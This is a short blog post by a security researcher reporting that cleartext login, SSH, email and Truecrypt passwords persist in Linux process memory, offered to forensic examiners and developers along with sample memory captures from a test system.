During the last few months I’ve investigated Linux memory, and consistently found cleartext passwords– including my login, SSH, email, IM, Truecrypt, and root passwords. The following paper includes details regarding each password’s location in memory and surrounding context.
Given the recent developments with cold boot memory dumping, the risk associated with cleartext passwords and other sensitive data in memory has significantly increased. Last week at HOPE Jacob Appelbaum released some of the cold boot tools which the Princeton, EFF and Wind River team used to dump and analyze memory.
My hope is that detailed information about cleartext passwords will be useful to forensic examiners and the Linux development community. For folks who would like to examine the data for themselves, below are a some snippets of process memory that I collected from my Ubuntu test system.
Each zipfile contains a pcat capture of process memory, as well as files containing the Ascii and Unicode strings. In the GDM process memory, you’ll find the login username, password, and shadow file information. In the Truecrypt process memory, you’ll find the volume location, password, and the command used to mount it. There’s other interesting stuff in there as well.
GDM process memory (.zip, 6.0M)
login username: myname1
Truecrypt process memory (.zip, 7.5M)
volume location: /home/myname1/Desktop/tcvol
shell command: truecrypt Desktop/tcvol)